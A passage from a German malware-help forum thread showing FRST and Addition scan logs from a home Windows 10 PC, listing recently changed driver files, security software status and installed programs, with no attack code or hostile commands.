2017-05-16 18:06 - 2017-04-14 21:32 - 00203648 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00156704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00148440 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00122744 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00115072 _____ C:\WINDOWS\system32\atidxx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00101760 _____ C:\WINDOWS\SysWOW64\atidxx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00068992 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ati2erec.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 10320248 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdvlk64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 08479104 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02536320 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amfrt64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02198400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amfrt32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00112512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00099192 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00864120 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00696192 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00514424 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00360312 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00091520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmcl64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00075136 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmcl32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00573800 _____ C:\WINDOWS\system32\amdmiracast.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00196176 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00164400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00139080 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00116072 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2017-05-12 20:28 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-05-10 21:47 - 2015-08-16 13:45 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-05-09 21:42 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-05-09 21:42 - 2015-05-01 17:30 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-05-09 21:40 - 2015-05-01 17:30 - 156335152 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-05-09 21:32 - 2015-04-25 06:35 - 00000000 ____D C:\Users\Dino\AppData\Local\Packages
2017-05-08 21:19 - 2015-04-25 07:09 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-05-08 21:13 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat
2017-05-07 21:26 - 2015-08-16 13:47 - 00002419 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-05-07 21:24 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-05-07 18:12 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2017-05-07 18:11 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning
2017-05-07 18:11 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI
2017-05-07 18:09 - 2017-03-18 22:56 - 00465408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00217600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll
2017-05-07 17:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration
2017-05-07 17:18 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2017-05-07 17:17 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RHD C:\Users\Public\Libraries
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate
2017-05-07 17:17 - 2015-08-16 13:44 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat
2017-05-07 17:16 - 2017-03-29 15:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ElsterFormular
2017-05-07 17:16 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-05-07 17:16 - 2017-02-19 12:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2017
2017-05-07 17:16 - 2017-02-05 21:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017
2017-05-07 17:16 - 2017-01-22 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SHARKOON Drakonia
2017-05-07 17:16 - 2016-02-13 13:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2016
2017-05-07 17:16 - 2015-08-22 17:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™
2017-05-07 17:16 - 2015-08-22 14:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2017-05-07 17:16 - 2015-05-24 14:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker
2017-05-07 17:16 - 2015-05-24 12:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Xbox 360 Accessories
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\WINDOWS\system32\STRING
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon MG5600 series Benutzerregistrierung
2017-05-07 17:16 - 2015-04-26 15:12 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-26 14:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-05-07 17:16 - 2015-04-26 14:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
2017-05-07 17:16 - 2015-04-26 13:55 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JDownloader
2017-05-07 17:16 - 2015-04-26 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarCraft II
2017-05-07 17:16 - 2015-04-26 13:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net
2017-05-07 17:16 - 2015-04-25 17:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-25 07:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CrystalDiskInfo
2017-05-07 17:16 - 2015-04-25 07:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung Magician
2017-05-07 17:16 - 2015-04-25 07:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lv-LV
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lv-LV
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\InputMethod
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\InputMethod
2017-05-07 17:14 - 2017-01-29 17:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavalys
2017-05-07 17:14 - 2017-01-22 15:26 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hammer & Chisel, Inc
2017-05-07 17:14 - 2016-11-30 18:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF24
2017-05-07 17:14 - 2016-11-30 18:10 - 00000000 ____D C:\WINDOWS\system32\ÿÿÿÿÿÿÿÿ8
2017-05-07 17:14 - 2016-05-01 13:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vulkan 1.0.3.1
2017-05-07 17:14 - 2015-08-31 18:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung
2017-05-07 17:14 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2017-05-07 17:14 - 2015-04-26 14:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paradox Interactive
2017-05-07 17:14 - 2015-04-25 17:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2017-05-07 17:14 - 2015-04-25 07:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Realtek
2017-05-07 17:14 - 2015-04-25 07:16 - 00000000 ____D C:\Program Files\Intel
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Shared
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Media.Shared
2017-05-07 17:13 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2017-05-01 12:45 - 2015-04-25 07:04 - 00000000 ____D C:\ProgramData\AMD
2017-05-01 12:44 - 2016-05-01 13:18 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2017-05-01 12:17 - 2016-09-30 17:45 - 00000000 ____D C:\ProgramData\Package Cache
2017-05-01 10:53 - 2015-04-25 17:43 - 00000000 ____D C:\Users\Dino\AppData\Local\Steam
2017-04-29 03:05 - 2017-03-18 23:06 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-04-29 03:05 - 2017-03-18 23:06 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\system32\atiapfxx.blb
2017-04-25 00:56 - 2017-04-14 01:44 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2017-04-25 00:51 - 2017-04-14 01:44 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap
2017-04-22 19:40 - 2015-04-26 13:54 - 00000000 ____D C:\Users\Dino\AppData\Local\JDownloader v2.0
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======
2015-04-25 17:18 - 2017-01-27 23:52 - 0007601 _____ () C:\Users\Dino\AppData\Local\Resmon.ResmonCfg
2017-02-05 19:40 - 2017-02-05 19:40 - 0046145 _____ () C:\ProgramData\agent.1486316443.bdinstall.bin
2017-02-05 20:08 - 2017-02-05 20:08 - 0026583 _____ () C:\ProgramData\agent.1486318128.bdinstall.bin
2017-02-05 20:09 - 2017-02-05 20:09 - 0026510 _____ () C:\ProgramData\agent.1486318150.bdinstall.bin
2017-02-05 20:52 - 2017-02-05 20:52 - 0046366 _____ () C:\ProgramData\agent.1486320772.bdinstall.bin
2017-02-05 20:55 - 2017-02-05 20:55 - 0028837 _____ () C:\ProgramData\agent.1486320909.bdinstall.bin
2017-02-05 20:57 - 2017-02-05 20:57 - 0046212 _____ () C:\ProgramData\agent.1486321078.bdinstall.bin
2017-02-05 21:01 - 2017-02-05 21:01 - 0026790 _____ () C:\ProgramData\agent.1486321314.bdinstall.bin
2017-02-05 21:02 - 2017-02-05 21:02 - 0028833 _____ () C:\ProgramData\agent.1486321377.bdinstall.bin
2017-02-05 21:11 - 2017-02-05 21:11 - 0046370 _____ () C:\ProgramData\agent.1486321901.bdinstall.bin
2017-02-09 19:09 - 2017-02-09 19:09 - 0028754 _____ () C:\ProgramData\agent.1486660167.bdinstall.bin
2017-03-08 21:56 - 2017-03-08 21:56 - 0029970 _____ () C:\ProgramData\agent.update.1489002971.bdinstall.bin
2017-02-05 21:15 - 2017-02-05 21:15 - 0381546 _____ () C:\ProgramData\cl.1486322005.bdinstall.bin
2017-02-05 21:17 - 2017-02-05 21:17 - 0055877 _____ () C:\ProgramData\dm.1486322271.bdinstall.bin
2017-02-07 23:33 - 2017-02-07 23:33 - 0035238 _____ () C:\ProgramData\dm.1486503192.bdinstall.bin
2017-05-07 17:13 - 2017-05-07 17:13 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
Einige Dateien in TEMP:
====================
2017-05-19 14:16 - 2017-05-19 14:16 - 7178424 _____ (VS Revo Group ) C:\Users\Dino\AppData\Local\Temp\VSUSetup.exe
==================== Bamital & volsnap ======================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert
LastRegBack: 2017-05-19 15:19
==================== Ende von FRST.txt ============================
|
|
22.05.2017, 17:39
| #13 |
| | Trojaner, Adware oder sonstiges ?Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 20-05-2017
durchgeführt von Dino (22-05-2017 18:36:44)
Gestartet von C:\Users\Dino\Desktop
Windows 10 Pro Version 1703 (X64) (2017-05-07 15:20:06)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-3554052566-3312977812-1675691648-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3554052566-3312977812-1675691648-503 - Limited - Disabled)
Dino (S-1-5-21-3554052566-3312977812-1675691648-1001 - Administrator - Enabled) => C:\Users\Dino
Gast (S-1-5-21-3554052566-3312977812-1675691648-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3554052566-3312977812-1675691648-1003 - Limited - Enabled)
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AV: Bitdefender Virenschutz (Enabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Spyware-Schutz (Enabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Bitdefender Firewall (Enabled) {078AF241-05A3-0EFF-40E0-3E0D69EA140A}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
ACP Application (Version: 2016.0321.0955.20 - Advanced Micro Devices, Inc.) Hidden
Adblock Plus für IE (32-Bit- und 64-Bit) (HKLM\...\{C27EF409-FB69-451F-B996-DC853C25FCA2}) (Version: 1.4 - Eyeo GmbH)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
AI Suite 3 (HKLM-x32\...\{CD36E28B-6023-469A-91E7-049A2874EC13}) (Version: 1.00.92 - ASUSTeK Computer Inc.)
AMD Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.)
ANNO 1404 - Königsedition (HKLM-x32\...\{3D9CF3CA-3AB0-4A82-9853-D7C43FD1D775}) (Version: 3.10.0000 - Ubisoft)
ANNO 2070 (HKLM-x32\...\{B48E264C-C8CD-4617-B0BE-46E977BAD694}) (Version: 1.0.0.0 - Ubisoft)
Anno 2205 (HKLM-x32\...\Uplay Install 1253) (Version: - Ubisoft)
ASUS GPU Tweak (HKLM-x32\...\InstallShield_{532F6E8A-AF97-41C3-915F-39F718EC07D1}) (Version: 2.8.2.0 - ASUSTek COMPUTER INC.)
ASUS GPU Tweak (x32 Version: 2.8.2.0 - ASUSTek COMPUTER INC.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Besiege (HKLM-x32\...\Steam App 346010) (Version: - Spiderling Studios)
Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.18.898 - Bitdefender)
Bitdefender Internet Security 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.5.0.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version: 1.5.2.3 - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.5.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.10.15 - Canon Inc.)
Canon MG5600 series Benutzerregistrierung (HKLM-x32\...\Canon MG5600 series Benutzerregistrierung) (Version: - *Canon Inc.)
Canon MG5600 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG5600_series) (Version: 1.00 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.2.1 - Canon Inc.)
Catalyst Control Center Next Localization BR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
